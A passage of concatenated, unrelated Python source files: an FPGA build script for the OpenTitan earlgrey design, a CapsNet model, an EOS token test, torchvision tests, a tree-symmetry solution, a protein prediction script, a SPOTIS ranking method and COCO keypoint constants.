'lowrisc_prim_all_0.1/rtl/prim_secded_39_32_enc.sv',
'lowrisc_prim_all_0.1/rtl/prim_secded_39_32_dec.sv',
'lowrisc_prim_all_0.1/rtl/prim_ram_2p_adv.sv',
'lowrisc_prim_all_0.1/rtl/prim_ram_2p_async_adv.sv',
'lowrisc_prim_flash_0/abstract/prim_flash.sv',
'lowrisc_top_earlgrey_alert_handler_reg_0.1/rtl/autogen/alert_handler_reg_pkg.sv',
'lowrisc_top_earlgrey_alert_handler_reg_0.1/rtl/autogen/alert_handler_reg_top.sv',
'lowrisc_top_earlgrey_pinmux_reg_0.1/rtl/autogen/pinmux_reg_pkg.sv',
'lowrisc_top_earlgrey_pinmux_reg_0.1/rtl/autogen/pinmux_reg_top.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_consts_pkg.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_nb_in_pe.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_nb_out_pe.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_nb_pe.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_rx.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_tx.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_tx_mux.sv',
'lowrisc_prim_generic_rom_0/rtl/prim_generic_rom.sv',
'lowrisc_prim_xilinx_rom_0/rtl/prim_xilinx_rom.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_fifo_sync.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_fifo_async.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_assert.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_err.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_assert_multiple.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/debug_rom/debug_rom.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_pkg.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_sba.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_csrs.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_mem.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dmi_cdc.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dmi_jtag.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dmi_jtag_tap.sv',
'lowrisc_prim_rom_0/abstract/prim_rom.sv',
'lowrisc_tlul_adapter_reg_0.1/rtl/tlul_adapter_reg.sv',
'lowrisc_tlul_adapter_sram_0.1/rtl/tlul_adapter_sram.sv',
'lowrisc_tlul_socket_1n_0.1/rtl/tlul_err_resp.sv',
'lowrisc_tlul_socket_1n_0.1/rtl/tlul_socket_1n.sv',
'lowrisc_tlul_socket_m1_0.1/rtl/tlul_socket_m1.sv',
'lowrisc_tlul_sram2tlul_0.1/rtl/sram2tlul.sv',
'lowrisc_ip_aes_0.5/rtl/aes_pkg.sv',
'lowrisc_ip_aes_0.5/rtl/aes_reg_pkg.sv',
'lowrisc_ip_aes_0.5/rtl/aes_reg_top.sv',
'lowrisc_ip_aes_0.5/rtl/aes_core.sv',
'lowrisc_ip_aes_0.5/rtl/aes_control.sv',
'lowrisc_ip_aes_0.5/rtl/aes_cipher_core.sv',
'lowrisc_ip_aes_0.5/rtl/aes_cipher_control.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sub_bytes.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sbox.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sbox_lut.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sbox_canright.sv',
'lowrisc_ip_aes_0.5/rtl/aes_shift_rows.sv',
'lowrisc_ip_aes_0.5/rtl/aes_mix_columns.sv',
'lowrisc_ip_aes_0.5/rtl/aes_mix_single_column.sv',
'lowrisc_ip_aes_0.5/rtl/aes_key_expand.sv',
'lowrisc_ip_aes_0.5/rtl/aes.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_pkg.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_reg_wrap.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_class.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_ping_timer.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_esc_timer.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_accu.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_ctrl_reg_pkg.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_ctrl_reg_top.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_erase_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_prog_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_rd_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_mp.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_phy.sv',
'lowrisc_ip_gpio_0.1/rtl/gpio_reg_pkg.sv',
'lowrisc_ip_gpio_0.1/rtl/gpio.sv',
'lowrisc_ip_gpio_0.1/rtl/gpio_reg_top.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_pkg.sv',
'lowrisc_ip_hmac_0.1/rtl/sha2.sv',
'lowrisc_ip_hmac_0.1/rtl/sha2_pad.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_reg_pkg.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_reg_top.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_core.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac.sv',
'lowrisc_ip_nmi_gen_0.1/rtl/nmi_gen_reg_pkg.sv',
'lowrisc_ip_nmi_gen_0.1/rtl/nmi_gen_reg_top.sv',
'lowrisc_ip_nmi_gen_0.1/rtl/nmi_gen.sv',
'lowrisc_ip_pinmux_component_0.1/rtl/pinmux.sv',
'lowrisc_ip_rv_core_ibex_0.1/rtl/rv_core_ibex.sv',
'lowrisc_ip_rv_dm_0.1/rtl/rv_dm.sv',
'lowrisc_ip_rv_dm_0.1/rtl/tlul_adapter_host.sv',
'lowrisc_ip_rv_plic_component_0.1/rtl/rv_plic_gateway.sv',
'lowrisc_ip_rv_plic_component_0.1/rtl/rv_plic_target.sv',
'lowrisc_ip_rv_timer_0.1/rtl/rv_timer_reg_pkg.sv',
'lowrisc_ip_rv_timer_0.1/rtl/rv_timer_reg_top.sv',
'lowrisc_ip_rv_timer_0.1/rtl/timer_core.sv',
'lowrisc_ip_rv_timer_0.1/rtl/rv_timer.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device_reg_pkg.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device_reg_top.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device_pkg.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_fwm_rxf_ctrl.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_fwm_txf_ctrl.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_fwmode.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device.sv',
'lowrisc_ip_uart_0.1/rtl/uart_reg_pkg.sv',
'lowrisc_ip_uart_0.1/rtl/uart_reg_top.sv',
'lowrisc_ip_uart_0.1/rtl/uart_rx.sv',
'lowrisc_ip_uart_0.1/rtl/uart_tx.sv',
'lowrisc_ip_uart_0.1/rtl/uart_core.sv',
'lowrisc_ip_uart_0.1/rtl/uart.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_reg_pkg.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_reg_top.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_usbif.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_flop_2syncpulse.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_linkstate.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_iomux.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev.sv',
'lowrisc_ip_xbar_main_0.1/tl_main_pkg.sv',
'lowrisc_ip_xbar_main_0.1/xbar_main.sv',
'lowrisc_ip_xbar_peri_0.1/tl_peri_pkg.sv',
'lowrisc_ip_xbar_peri_0.1/xbar_peri.sv',
'lowrisc_top_earlgrey_rv_plic_0.1/rtl/autogen/rv_plic_reg_pkg.sv',
'lowrisc_top_earlgrey_rv_plic_0.1/rtl/autogen/rv_plic_reg_top.sv',
'lowrisc_top_earlgrey_rv_plic_0.1/rtl/autogen/rv_plic.sv',
'lowrisc_systems_top_earlgrey_0.1/rtl/padctl.sv',
'lowrisc_systems_top_earlgrey_0.1/rtl/autogen/top_earlgrey.sv',
'lowrisc_systems_top_earlgrey_zcu104_0.1/rtl/clkgen_xilusp.sv',
'lowrisc_systems_top_earlgrey_zcu104_0.1/rtl/top_earlgrey_zcu104.sv',
]
with open(post_imp_file, 'w') as f:
f.write('write_checkpoint -force design.dcp')
files = [{
'name':
os.path.realpath(
'lowrisc_systems_top_earlgrey_zcu104_0.1/data/pins_zcu104.xdc'),
'file_type':
'xdc'
},
{
'name':
os.path.realpath('lowrisc_prim_assert_0.1/rtl/prim_assert.sv'),
'file_type':
'systemVerilogSource',
'is_include_file':
'true'
}]
parameters = {
'ROM_INIT_FILE': {
'datatype': 'str',
'paramtype': 'vlogdefine'
},
'PRIM_DEFAULT_IMPL': {
'datatype': 'str',
'paramtype': 'vlogdefine'
},
}
for src in srcs:
files.append({
'name': os.path.realpath(src),
'file_type': 'systemVerilogSource'
})
tool = 'vivado'
incdirs = [os.path.realpath('lowrisc_prim_assert_0.1/rtl')]
edam = {
'files': files,
'name': 'design',
'toplevel': 'top_earlgrey_zcu104',
'parameters': parameters,
'tool_options': {
'vivado': {
'part': os.environ['URAY_PART'],
'post_imp': post_imp_file,
'synth': synth_tool
}
}
}
backend = edalize.get_edatool(tool)(edam=edam, work_root=work_root)
args = [
'--ROM_INIT_FILE={}'.format(
os.path.realpath('boot_rom_fpga_nexysvideo.vmem')),
'--PRIM_DEFAULT_IMPL=prim_pkg::ImplXilinx'
]
backend.configure(args)
backend.build()
|
from argparse import ArgumentParser
from src.dummy_manager import (
DummyGameOverManager, DummyMenuManager, DummyOverWorldManager,
DummyQuestionManager
)
from src.game import Game
from src.manager import GameManager
def main() -> None:
"""Run the game"""
parser = ArgumentParser()
parser.set_defaults(manager=GameManager)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('--menu', dest='manager', action='store_const', const=DummyMenuManager)
group.add_argument('--over_world', dest='manager', action='store_const', const=DummyOverWorldManager)
group.add_argument('--question', dest='manager', action='store_const', const=DummyQuestionManager)
group.add_argument('--game_over', dest='manager', action='store_const', const=DummyGameOverManager)
args = parser.parse_args()
game = Game(args.manager)
game.run()
if __name__ == '__main__':
main()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
USE_CUDA = True if torch.cuda.is_available() else False
class ConvLayer(nn.Module):
def __init__(self, in_channels=1, out_channels=256, kernel_size=9):
super(ConvLayer, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=1
)
def forward(self, x):
return F.relu(self.conv(x))
class PrimaryCaps(nn.Module):
def __init__(self, num_capsules=8, in_channels=256, out_channels=32, kernel_size=9, num_routes=32 * 6 * 6):
super(PrimaryCaps, self).__init__()
self.num_routes = num_routes
self.capsules = nn.ModuleList([
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=2, padding=0)
for _ in range(num_capsules)])
def forward(self, x):
u = [capsule(x) for capsule in self.capsules]
u = torch.stack(u, dim=1)
u = u.view(x.size(0), self.num_routes, -1)
return self.squash(u)
def squash(self, input_tensor):
squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
output_tensor = squared_norm * input_tensor / ((1. + squared_norm) * torch.sqrt(squared_norm))
return output_tensor
class DigitCaps(nn.Module):
def __init__(self, num_capsules=10, num_routes=32 * 6 * 6, in_channels=8, out_channels=16):
super(DigitCaps, self).__init__()
self.in_channels = in_channels
self.num_routes = num_routes
self.num_capsules = num_capsules
self.W = nn.Parameter(torch.randn(1, num_routes, num_capsules, out_channels, in_channels))
def forward(self, x):
batch_size = x.size(0)
x = torch.stack([x] * self.num_capsules, dim=2).unsqueeze(4)
W = torch.cat([self.W] * batch_size, dim=0)
u_hat = torch.matmul(W, x)
b_ij = Variable(torch.zeros(1, self.num_routes, self.num_capsules, 1))
if USE_CUDA:
b_ij = b_ij.cuda()
num_iterations = 3
for iteration in range(num_iterations):
c_ij = F.softmax(b_ij, dim=1)
c_ij = torch.cat([c_ij] * batch_size, dim=0).unsqueeze(4)
s_j = (c_ij * u_hat).sum(dim=1, keepdim=True)
v_j = self.squash(s_j)
if iteration < num_iterations - 1:
a_ij = torch.matmul(u_hat.transpose(3, 4), torch.cat([v_j] * self.num_routes, dim=1))
b_ij = b_ij + a_ij.squeeze(4).mean(dim=0, keepdim=True)
return v_j.squeeze(1)
def squash(self, input_tensor):
squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
output_tensor = squared_norm * input_tensor / ((1. + squared_norm) * torch.sqrt(squared_norm))
return output_tensor
class Decoder(nn.Module):
def __init__(self, input_width=28, input_height=28, input_channel=1):
super(Decoder, self).__init__()
self.input_width = input_width
self.input_height = input_height
self.input_channel = input_channel
self.reconstraction_layers = nn.Sequential(
nn.Linear(16 * 10, 512),
nn.ReLU(inplace=True),
nn.Linear(512, 1024),
nn.ReLU(inplace=True),
nn.Linear(1024, self.input_height * self.input_width * self.input_channel),
nn.Sigmoid()
)
def forward(self, x, data):
classes = torch.sqrt((x ** 2).sum(2))
classes = F.softmax(classes, dim=0)
_, max_length_indices = classes.max(dim=1)
masked = Variable(torch.sparse.torch.eye(10))
if USE_CUDA:
masked = masked.cuda()
masked = masked.index_select(dim=0, index=Variable(max_length_indices.squeeze(1).data))
t = (x * masked[:, :, None, None]).view(x.size(0), -1)
reconstructions = self.reconstraction_layers(t)
reconstructions = reconstructions.view(-1, self.input_channel, self.input_width, self.input_height)
return reconstructions, masked
class CapsNet(nn.Module):
def __init__(self, config=None):
super(CapsNet, self).__init__()
if config:
self.conv_layer = ConvLayer(config.cnn_in_channels, config.cnn_out_channels, config.cnn_kernel_size)
self.primary_capsules = PrimaryCaps(config.pc_num_capsules, config.pc_in_channels, config.pc_out_channels,
config.pc_kernel_size, config.pc_num_routes)
self.digit_capsules = DigitCaps(config.dc_num_capsules, config.dc_num_routes, config.dc_in_channels,
config.dc_out_channels)
self.decoder = Decoder(config.input_width, config.input_height, config.cnn_in_channels)
else:
self.conv_layer = ConvLayer()
self.primary_capsules = PrimaryCaps()
self.digit_capsules = DigitCaps()
self.decoder = Decoder()
self.mse_loss = nn.MSELoss()
def forward(self, data):
output = self.digit_capsules(self.primary_capsules(self.conv_layer(data)))
reconstructions, masked = self.decoder(output, data)
return output, reconstructions, masked
def loss(self, data, x, target, reconstructions):
return self.margin_loss(x, target) + self.reconstruction_loss(data, reconstructions)
def margin_loss(self, x, labels, size_average=True):
batch_size = x.size(0)
v_c = torch.sqrt((x ** 2).sum(dim=2, keepdim=True))
left = F.relu(0.9 - v_c).view(batch_size, -1)
right = F.relu(v_c - 0.1).view(batch_size, -1)
loss = labels * left + 0.5 * (1.0 - labels) * right
loss = loss.sum(dim=1).mean()
return loss
def reconstruction_loss(self, data, reconstructions):
loss = self.mse_loss(reconstructions.view(reconstructions.size(0), -1), data.view(reconstructions.size(0), -1))
return loss * 0.0005
|
import sys
from eosfactory.eosf import *
verbosity([Verbosity.INFO, Verbosity.OUT, Verbosity.DEBUG])
CONTRACT_WORKSPACE = sys.path[0] + "/../"
# Actors of the test:
MASTER = MasterAccount()
HOST = Account()
ALICE = Account()
BOB = Account()
CAROL = Account()
def test():
SCENARIO('''
Initialize the token and run a couple of transfers between different accounts.
''')
reset()
create_master_account("MASTER")
COMMENT('''
Build & deploy the contract:
''')
create_account("HOST", MASTER)
smart = Contract(HOST, CONTRACT_WORKSPACE)
smart.build(force=False)
smart.deploy()
COMMENT('''
Create test accounts:
''')
create_account("ALICE", MASTER)
create_account("BOB", MASTER)
create_account("CAROL", MASTER)
COMMENT('''
Initialize the token and send some tokens to one of the accounts:
''')
HOST.push_action(
"create",
{
"issuer": MASTER,
"maximum_supply": "1000000000.0000 EOS",
"can_freeze": "0",
"can_recall": "0",
"can_whitelist": "0"
},
permission=[(MASTER, Permission.OWNER), (HOST, Permission.ACTIVE)])
HOST.push_action(
"issue",
{
"to": ALICE, "quantity": "100.0000 EOS", "memo": ""
},
permission=(MASTER, Permission.ACTIVE))
COMMENT('''
Execute a series of transfers between the accounts:
''')
HOST.push_action(
"transfer",
{
"from": ALICE, "to": CAROL,
"quantity": "25.0000 EOS", "memo":""
},
permission=(ALICE, Permission.ACTIVE))
HOST.push_action(
"transfer",
{
"from": CAROL, "to": BOB,
"quantity": "11.0000 EOS", "memo": ""
},
permission=(CAROL, Permission.ACTIVE))
HOST.push_action(
"transfer",
{
"from": CAROL, "to": BOB,
"quantity": "2.0000 EOS", "memo": ""
},
permission=(CAROL, Permission.ACTIVE))
HOST.push_action(
"transfer",
{
"from": BOB, "to": ALICE,
"quantity": "2.0000 EOS", "memo":""
},
permission=(BOB, Permission.ACTIVE))
COMMENT('''
Verify the outcome:
''')
table_alice = HOST.table("accounts", ALICE)
table_bob = HOST.table("accounts", BOB)
table_carol = HOST.table("accounts", CAROL)
assert(table_alice.json["rows"][0]["balance"] == '77.0000 EOS')
assert(table_bob.json["rows"][0]["balance"] == '11.0000 EOS')
assert(table_carol.json["rows"][0]["balance"] == '12.0000 EOS')
stop()
if __name__ == "__main__":
test()
|
from .hashtag import Hashtag
from .hashtagstats_manager import HashtagStatsManager
|
import sys
from socket import *
from protocol import *
name=sys.argv[1]
lang=sys.argv[2]
email=sys.argv[3]
phone=sys.argv[4]
academic=sys.argv[5]
other=sys.argv[6]
auth=sys.argv[7]
d={'name':name,'lang':lang,'email':email,'phone':phone,'academic':academic,'other':other,'auth':auth}
for key in ['email','phone','academic','other']:
if(d[key]=='0'):
d.pop(key)
content={}
for i in d:
if(i!='auth' and i!='lang'):
content[i]=d[i]
serverName = '127.0.0.1'
serverPort = 12000
clientSocket = socket(AF_INET, SOCK_DGRAM)
request=Message(clientSocket,serverName,serverPort)
request.write_client(content,d['auth'],d['lang'])
request.read_client()
clientSocket.close()
|
##
##
# File auto-generated against equivalent DynamicSerialize Java class
class CommitGridsRequest(object):
def __init__(self):
self.commits = None
self.workstationID = None
self.siteID = None
def getCommits(self):
return self.commits
def setCommits(self, commits):
self.commits = commits
def getWorkstationID(self):
return self.workstationID
def setWorkstationID(self, workstationID):
self.workstationID = workstationID
def getSiteID(self):
return self.siteID
def setSiteID(self, siteID):
self.siteID = siteID
|
import torch
from torchvision import transforms as T
from torchvision.transforms import functional as F
from PIL import Image
import numpy as np
import unittest
class Tester(unittest.TestCase):
def _create_data(self, height=3, width=3, channels=3):
tensor = torch.randint(0, 255, (channels, height, width), dtype=torch.uint8)
pil_img = Image.fromarray(tensor.permute(1, 2, 0).contiguous().numpy())
return tensor, pil_img
def compareTensorToPIL(self, tensor, pil_image):
pil_tensor = torch.as_tensor(np.array(pil_image).transpose((2, 0, 1)))
self.assertTrue(tensor.equal(pil_tensor))
def _test_flip(self, func, method):
tensor, pil_img = self._create_data()
flip_tensor = getattr(F, func)(tensor)
flip_pil_img = getattr(F, func)(pil_img)
self.compareTensorToPIL(flip_tensor, flip_pil_img)
scripted_fn = torch.jit.script(getattr(F, func))
flip_tensor_script = scripted_fn(tensor)
self.assertTrue(flip_tensor.equal(flip_tensor_script))
# test for class interface
f = getattr(T, method)()
scripted_fn = torch.jit.script(f)
scripted_fn(tensor)
def test_random_horizontal_flip(self):
self._test_flip('hflip', 'RandomHorizontalFlip')
def test_random_vertical_flip(self):
self._test_flip('vflip', 'RandomVerticalFlip')
def test_adjustments(self):
fns = ['adjust_brightness', 'adjust_contrast', 'adjust_saturation']
for _ in range(20):
factor = 3 * torch.rand(1).item()
tensor, _ = self._create_data()
pil_img = T.ToPILImage()(tensor)
for func in fns:
adjusted_tensor = getattr(F, func)(tensor, factor)
adjusted_pil_img = getattr(F, func)(pil_img, factor)
adjusted_pil_tensor = T.ToTensor()(adjusted_pil_img)
scripted_fn = torch.jit.script(getattr(F, func))
adjusted_tensor_script = scripted_fn(tensor, factor)
if not tensor.dtype.is_floating_point:
adjusted_tensor = adjusted_tensor.to(torch.float) / 255
adjusted_tensor_script = adjusted_tensor_script.to(torch.float) / 255
# F uses uint8 and F_t uses float, so there is a small
# difference in values caused by (at most 5) truncations.
max_diff = (adjusted_tensor - adjusted_pil_tensor).abs().max()
max_diff_scripted = (adjusted_tensor - adjusted_tensor_script).abs().max()
self.assertLess(max_diff, 5 / 255 + 1e-5)
self.assertLess(max_diff_scripted, 5 / 255 + 1e-5)
if __name__ == '__main__':
unittest.main()
|
"""
Given a binary tree, check whether it is a mirror of itself (ie, symmetric
around its center).
For example, this binary tree is symmetric:
1
/ \
2 2
/ \ / \
3 4 4 3
But the following is not:
1
/ \
2 2
\ \
3 3
Note:
Bonus points if you could solve it both recursively and iteratively.
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isNodeSymmetric(self,p,q):
if p is None and q is None:
return True
elif p is not None and q is not None and p.val==q.val:
return self.isNodeSymmetric(p.left,q.right) and self.isNodeSymmetric(p.right,q.left)
else:
return False
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None:
return True
else:
return self.isNodeSymmetric(root.left,root.right)
|
#!/usr/bin/env python
import os
import click
import torch
import numpy as np
def load_models(model_dir):
models = []
for path in os.listdir(model_dir):
if path.endswith(".pt"):
models.append(torch.jit.load(os.path.join(model_dir, path)))
return models
def parse_feature(aln_path):
AMINO = "ACDEFGHIKLMNPQRSTVWY-XBZUOJ"
msa = [line.strip() for line in open(aln_path) if not line.startswith(">")]
msa = [[AMINO.index(_) for _ in line if _ in AMINO] for line in msa]
msa = torch.tensor(msa).long()
msa[msa >= 21] = 20
return msa
def predict_single(models, aln_path, output_path):
feat = parse_feature(aln_path)
cbcb, omega, theta, phi = [], [], [], []
with torch.no_grad():
for model in models:
a, b, c, d = model(feat)
cbcb.append(a.cpu().numpy())
omega.append(b.cpu().numpy())
theta.append(c.cpu().numpy())
phi.append(d.cpu().numpy())
np.savez(
output_path,
cbcb=np.mean(cbcb, axis=0),
omega=np.mean(omega, axis=0),
theta=np.mean(theta, axis=0),
phi=np.mean(phi, axis=0),
)
@click.command()
@click.option("-m", "--model_dir", required=True, type=click.Path())
@click.option("-i", "--aln_path", required=True, type=click.Path())
@click.option("-o", "--output_path", required=True, type=click.Path())
def main(model_dir, aln_path, output_path):
"""
predict from a *.aln file
"""
models = load_models(model_dir)
predict_single(models, aln_path, output_path)
if __name__ == "__main__":
main()
|
import numpy as np
from mcdm_method import MCDM_method
class SPOTIS(MCDM_method):
def __init__(self):
"""
Create SPOTIS method object.
"""
pass
def __call__(self, matrix, weights, types, bounds):
"""
Score alternatives provided in decision matrix `matrix` using criteria `weights` and criteria `types`.
Parameters
----------
matrix : ndarray
Decision matrix with m alternatives in rows and n criteria in columns.
weights: ndarray
Criteria weights. Sum of weights must be equal to 1.
types: ndarray
Criteria types. Profit criteria are represented by 1 and cost by -1.
bounds: ndarray
Bounds contain minimum and maximum values of each criterion. Minimum and maximum cannot be the same.
Returns
-------
ndrarray
Preference values of each alternative. The best alternative has the lowest preference value.
"""
SPOTIS._verify_input_data(matrix, weights, types)
return SPOTIS._spotis(matrix, weights, types, bounds)
@staticmethod
def _spotis(matrix, weights, types, bounds):
isp = np.zeros(matrix.shape[1])
#ideal solution point
isp[types == 1] = bounds[1, types == 1]
isp[types == -1] = bounds[0, types == -1]
norm_matrix = np.abs(matrix - isp) / np.abs(bounds[1, :] - bounds[0, :])
D = np.sum(weights * norm_matrix, axis = 1)
return D
|
import numpy as np
COCO_PERSON_SKELETON = [
(16, 14), (14, 12), (17, 15), (15, 13), (12, 13), (6, 12), (7, 13),
(6, 7), (6, 8), (7, 9), (8, 10), (9, 11), (2, 3), (1, 2), (1, 3),
(2, 4), (3, 5), (4, 6), (5, 7),
]
KINEMATIC_TREE_SKELETON = [
(1, 2), (2, 4), # left head
(1, 3), (3, 5),
(1, 6),
(6, 8), (8, 10), # left arm
(1, 7),
(7, 9), (9, 11), # right arm
(6, 12), (12, 14), (14, 16), # left side
(7, 13), (13, 15), (15, 17),
]
COCO_KEYPOINTS = [
'nose', # 1
'left_eye', # 2
'right_eye', # 3
'left_ear', # 4
'right_ear', # 5
'left_shoulder', # 6
'right_shoulder', # 7
'left_elbow', # 8
'right_elbow', # 9
'left_wrist', # 10
'right_wrist', # 11
'left_hip', # 12
'right_hip', # 13
'left_knee', # 14
'right_knee', # 15
'left_ankle', # 16
'right_ankle', # 17
]
COCO_UPRIGHT_POSE = np.array([
[0.0, 9.3, 2.0], # 'nose', # 1
[-0.35, 9.7, 2.0], # 'left_eye', # 2
[0.35, 9.7, 2.0], # 'right_eye', # 3
[-0.7, 9.5, 2.0], # 'left_ear', # 4
[0.7, 9.5, 2.0], # 'right_ear', # 5
[-1.4, 8.0, 2.0], # 'left_shoulder', # 6
[1.4, 8.0, 2.0], # 'right_shoulder', # 7
[-1.75, 6.0, 2.0], # 'left_elbow', # 8
[1.75, 6.2, 2.0], # 'right_elbow', # 9
[-1.75, 4.0, 2.0], # 'left_wrist', # 10
[1.75, 4.2, 2.0], # 'right_wrist', # 11
[-1.26, 4.0, 2.0], # 'left_hip', # 12
[1.26, 4.0, 2.0], # 'right_hip', # 13
[-1.4, 2.0, 2.0], # 'left_knee', # 14
[1.4, 2.1, 2.0], # 'right_knee', # 15
[-1.4, 0.0, 2.0], # 'left_ankle', # 16
[1.4, 0.1, 2.0], # 'right_ankle', # 17
])
COCO_DAVINCI_POSE = np.array([
[0.0, 9.3, 2.0], # 'nose', # 1
[-0.35, 9.7, 2.0], # 'left_eye', # 2
[0.35, 9.7, 2.0], # 'right_eye', # 3
[-0.7, 9.5, 2.0], # 'left_ear', # 4
[0.7, 9.5, 2.0], # 'right_ear', # 5
[-1.4, 8.0, 2.0], # 'left_shoulder', # 6
[1.4, 8.0, 2.0], # 'right_shoulder', # 7
[-3.3, 9.0, 2.0], # 'left_elbow', # 8
[3.3, 9.2, 2.0], # 'right_elbow', # 9
[-4.5, 10.5, 2.0], # 'left_wrist', # 10
[4.5, 10.7, 2.0], # 'right_wrist', # 11
[-1.26, 4.0, 2.0], # 'left_hip', # 12
[1.26, 4.0, 2.0], # 'right_hip', # 13
[-2.0, 2.0, 2.0], # 'left_knee', # 14
[2.0, 2.1, 2.0], # 'right_knee', # 15
[-2.4, 0.0, 2.0], # 'left_ankle', # 16
[2.4, 0.1, 2.0], # 'right_ankle', # 17
])
HFLIP = {
'left_eye': 'right_eye',
'right_eye': 'left_eye',
'left_ear': 'right_ear',
'right_ear': 'left_ear',
'left_shoulder': 'right_shoulder',
'right_shoulder': 'left_shoulder',
'left_elbow': 'right_elbow',
'right_elbow': 'left_elbow',
'left_wrist': 'right_wrist',
'right_wrist': 'left_wrist',
'left_hip': 'right_hip',
'right_hip': 'left_hip',
'left_knee': 'right_knee',
'right_knee': 'left_knee',
'left_ankle': 'right_ankle',
'right_ankle': 'left_ankle',
}
DENSER_COCO_PERSON_SKELETON = [
(1, 2), (1, 3), (2, 3), (1, 4), (1, 5), (4, 5),
(1, 6), (1, 7), (2, 6), (3, 7),
(2, 4), (3, 5), (4, 6), (5, 7), (6, 7),
(6, 12), (7, 13), (6, 13), (7, 12), (12, 13),
(6, 8), (7, 9), (8, 10), (9, 11), (6, 10), (7, 11),
(8, 9), (10, 11),
(10, 12), (11, 13),
(10, 14), (11, 15),
(14, 12), (15, 13), (12, 15), (13, 14),
(12, 16), (13, 17),
(16, 14), (17, 15), (14, 17), (15, 16),
(14, 15), (16, 17),
]
DENSER_COCO_PERSON_CONNECTIONS = [
c
for c in DENSER_COCO_PERSON_SKELETON
if c not in COCO_PERSON_SKELETON
]
COCO_PERSON_SIGMAS = [
0.026, # nose
0.025, # eyes
0.025, # eyes
0.035, # ears
0.035, # ears
0.079, # shoulders
0.079, # shoulders
0.072, # elbows
0.072, # elbows
0.062, # wrists
0.062, # wrists
0.107, # hips
0.107, # hips
0.087, # knees
0.087, # knees
0.089, # ankles
0.089, # ankles
]
COCO_PERSON_SCORE_WEIGHTS = [3.0] * 3 + [1.0] * (len(COCO_KEYPOINTS) - 3)
COCO_CATEGORIES = [
'person',
'bicycle',
'car',
'motorcycle',
'airplane',
'bus',
'train',
'truck',
'boat',
'traffic light',
'fire hydrant',
'street sign',
'stop sign',
'parking meter',
'bench',
'bird',
'cat',
'dog',
'horse',
'sheep',
'cow',
'elephant',
'bear',
'zebra',
'giraffe',
'hat',
'backpack',
'umbrella',
'shoe',
'eye glasses',
'handbag',
'tie',
'suitcase',
'frisbee',
'skis',
'snowboard',
'sports ball',
'kite',
'baseball bat',
'baseball glove',
'skateboard',
'surfboard',
'tennis racket',
'bottle',
'plate',
'wine glass',
'cup',
